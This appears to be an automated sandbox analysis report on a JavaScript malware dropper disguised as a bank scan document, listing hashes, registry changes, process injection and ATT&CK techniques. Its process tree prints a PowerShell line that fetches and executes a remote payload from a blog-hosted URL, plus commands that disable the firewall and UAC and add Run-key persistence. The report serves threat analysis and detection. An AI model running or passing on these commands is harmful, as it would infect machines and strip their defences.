Analysis
-
max time kernel
290s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
16-01-2024 10:45
Static task
static1
Behavioral task
behavioral1
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win11-20231222-en
General
-
Target
New_ScanDoc#092387CHASEeAdvice.js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 2196 powershell.exe 4 2196 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1364394410-760759377-2797241167-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1364394410-760759377-2797241167-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1364394410-760759377-2797241167-1000\Software\Microsoft\Windows\CurrentVersion\Run\Deissl1 = "schtasks /run /tn Deissl1" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 api.ipify.org 11 api.ipify.org 12 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 2196 set thread context of 4688 2196 powershell.exe RegSvcs.exe PID 2196 set thread context of 752 2196 powershell.exe RegSvcs.exe PID 2196 set thread context of 756 2196 powershell.exe Msbuild.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 3 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1364394410-760759377-2797241167-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-1364394410-760759377-2797241167-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1364394410-760759377-2797241167-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exeRegSvcs.exedw20.exedw20.exepid process 2196 powershell.exe 2196 powershell.exe 2196 powershell.exe 2196 powershell.exe 2196 powershell.exe 2196 powershell.exe 2196 powershell.exe 4688 RegSvcs.exe 4688 RegSvcs.exe 2388 dw20.exe 2388 dw20.exe 3372 dw20.exe 3372 dw20.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2196 powershell.exe Token: SeIncreaseQuotaPrivilege 2196 powershell.exe Token: SeSecurityPrivilege 2196 powershell.exe Token: SeTakeOwnershipPrivilege 2196 powershell.exe Token: SeLoadDriverPrivilege 2196 powershell.exe Token: SeSystemProfilePrivilege 2196 powershell.exe Token: SeSystemtimePrivilege 2196 powershell.exe Token: SeProfSingleProcessPrivilege 2196 powershell.exe Token: SeIncBasePriorityPrivilege 2196 powershell.exe Token: SeCreatePagefilePrivilege 2196 powershell.exe Token: SeBackupPrivilege 2196 powershell.exe Token: SeRestorePrivilege 2196 powershell.exe Token: SeShutdownPrivilege 2196 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeSystemEnvironmentPrivilege 2196 powershell.exe Token: SeRemoteShutdownPrivilege 2196 powershell.exe Token: SeUndockPrivilege 2196 powershell.exe Token: SeManageVolumePrivilege 2196 powershell.exe Token: 33 2196 powershell.exe Token: 34 2196 powershell.exe Token: 35 2196 powershell.exe Token: 36 2196 powershell.exe Token: SeIncreaseQuotaPrivilege 2196 powershell.exe Token: SeSecurityPrivilege 2196 powershell.exe Token: SeTakeOwnershipPrivilege 2196 powershell.exe Token: SeLoadDriverPrivilege 2196 powershell.exe Token: SeSystemProfilePrivilege 2196 powershell.exe Token: SeSystemtimePrivilege 2196 powershell.exe Token: SeProfSingleProcessPrivilege 2196 powershell.exe Token: SeIncBasePriorityPrivilege 2196 powershell.exe Token: SeCreatePagefilePrivilege 2196 powershell.exe Token: SeBackupPrivilege 2196 powershell.exe Token: SeRestorePrivilege 2196 powershell.exe Token: SeShutdownPrivilege 2196 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeSystemEnvironmentPrivilege 2196 powershell.exe Token: SeRemoteShutdownPrivilege 2196 powershell.exe Token: SeUndockPrivilege 2196 powershell.exe Token: SeManageVolumePrivilege 2196 powershell.exe Token: 33 2196 powershell.exe Token: 34 2196 powershell.exe Token: 35 2196 powershell.exe Token: 36 2196 powershell.exe Token: SeIncreaseQuotaPrivilege 2196 powershell.exe Token: SeSecurityPrivilege 2196 powershell.exe Token: SeTakeOwnershipPrivilege 2196 powershell.exe Token: SeLoadDriverPrivilege 2196 powershell.exe Token: SeSystemProfilePrivilege 2196 powershell.exe Token: SeSystemtimePrivilege 2196 powershell.exe Token: SeProfSingleProcessPrivilege 2196 powershell.exe Token: SeIncBasePriorityPrivilege 2196 powershell.exe Token: SeCreatePagefilePrivilege 2196 powershell.exe Token: SeBackupPrivilege 2196 powershell.exe Token: SeRestorePrivilege 2196 powershell.exe Token: SeShutdownPrivilege 2196 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeSystemEnvironmentPrivilege 2196 powershell.exe Token: SeRemoteShutdownPrivilege 2196 powershell.exe Token: SeUndockPrivilege 2196 powershell.exe Token: SeManageVolumePrivilege 2196 powershell.exe Token: 33 2196 powershell.exe Token: 34 2196 powershell.exe Token: 35 2196 powershell.exe Token: 36 2196 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
wscript.exepowershell.execsc.exeRegSvcs.exeMsbuild.exedescription pid process target process PID 3768 wrote to memory of 2196 3768 wscript.exe powershell.exe PID 3768 wrote to memory of 2196 3768 wscript.exe powershell.exe PID 2196 wrote to memory of 2964 2196 powershell.exe csc.exe PID 2196 wrote to memory of 2964 2196 powershell.exe csc.exe PID 2964 wrote to memory of 1768 2964 csc.exe cvtres.exe PID 2964 wrote to memory of 1768 2964 csc.exe cvtres.exe PID 2196 wrote to memory of 3332 2196 powershell.exe netsh.exe PID 2196 wrote to memory of 3332 2196 powershell.exe netsh.exe PID 2196 wrote to memory of 4688 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 4688 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 4688 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 4688 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 4688 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 4688 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 4688 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 4688 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 752 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 752 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 752 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 752 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 752 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 752 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 752 2196 powershell.exe RegSvcs.exe PID 2196 wrote to memory of 752 2196 powershell.exe RegSvcs.exe PID 752 wrote to memory of 2388 752 RegSvcs.exe dw20.exe PID 752 wrote to memory of 2388 752 RegSvcs.exe dw20.exe PID 752 wrote to memory of 2388 752 RegSvcs.exe dw20.exe PID 2196 wrote to memory of 756 2196 powershell.exe Msbuild.exe PID 2196 wrote to memory of 756 2196 powershell.exe Msbuild.exe PID 2196 wrote to memory of 756 2196 powershell.exe Msbuild.exe PID 2196 wrote to memory of 756 2196 powershell.exe Msbuild.exe PID 2196 wrote to memory of 756 2196 powershell.exe Msbuild.exe PID 2196 wrote to memory of 756 2196 powershell.exe Msbuild.exe PID 2196 wrote to memory of 756 2196 powershell.exe Msbuild.exe PID 2196 wrote to memory of 756 2196 powershell.exe Msbuild.exe PID 756 wrote to memory of 3372 756 Msbuild.exe dw20.exe PID 756 wrote to memory of 3372 756 Msbuild.exe dw20.exe PID 756 wrote to memory of 3372 756 Msbuild.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js1⤵
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c5suvrj0\c5suvrj0.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FCF.tmp" "c:\Users\Admin\AppData\Local\Temp\c5suvrj0\CSC46BEA21AFB854ECAA21C937E3F6D1B75.TMP"4⤵PID:1768
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
PID:3332 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4688 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7084⤵
- Suspicious behavior: EnumeratesProcesses
PID:2388 -
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 6924⤵
- Suspicious behavior: EnumeratesProcesses
PID:3372
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e431c0b42b0f38f514869886df65a3fc
SHA1fa72fb12e092563697ea45c7f3f283f3f811d894
SHA2564b8556874c35b9bf7d8dba698b0edbcc1af4ebe5ba001837545a6666e4d22ce2
SHA512cd3d874293ffdbd1a43328a4d650d02d1e94797fecbb4fa19624a57e24170e945ad4e265ca4306911b553be570cdbd0a1f3fa17c0dd4a6ea5566c75580cf6046
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3KB
MD58989c5e3ade9ade9e4807db91296c5b1
SHA1e697809f722479d6a9ae9f21ab63c1858830fc59
SHA25636565ac7aac6267d69885c606e3cfd2149c2b7bc57f217e0c687867ba131006d
SHA512382eb992b2092ce83242b63c0d51a6cbb9218a45363e80f69b15dcd43c1ed9bc208e07447f29d7df3d17f3125d52e3cbe05f54d4b351dc5e2bce7b67752d21c3
-
Filesize
652B
MD5916597f2fcf850f41c61947adc81f1f3
SHA10a37d3c94bd94f4d2177d22f88d74dc05a4dcbb1
SHA256036de56932dbad4712a99eb22f4d5e8337b0c362bc845a57439d89c7dc238921
SHA512c41068edb0e67aaf268ce1d08dafd2176ef0114431444c1e3e214504c023866ef95f629138e4c6a4cff529a411832620a7399e667b206c2c55f7a7804c5cbe1a
-
Filesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
Filesize
369B
MD51125f91ed30b79209277636c3ae8c18c
SHA1c63a375b7f7a391f28ad7bfbe069a8a4b4883ec6
SHA256636b41248f090a43866fbdeacb92d06a1547f375eef217a7bec3fbdec08672af
SHA5128f0747dddf899c7108c8e49258f140c1fa3ba434e679975ca676e20f368d37e381774893c2283189e9597b209d688cd1c65238074be2d68a62f843aae3baeff6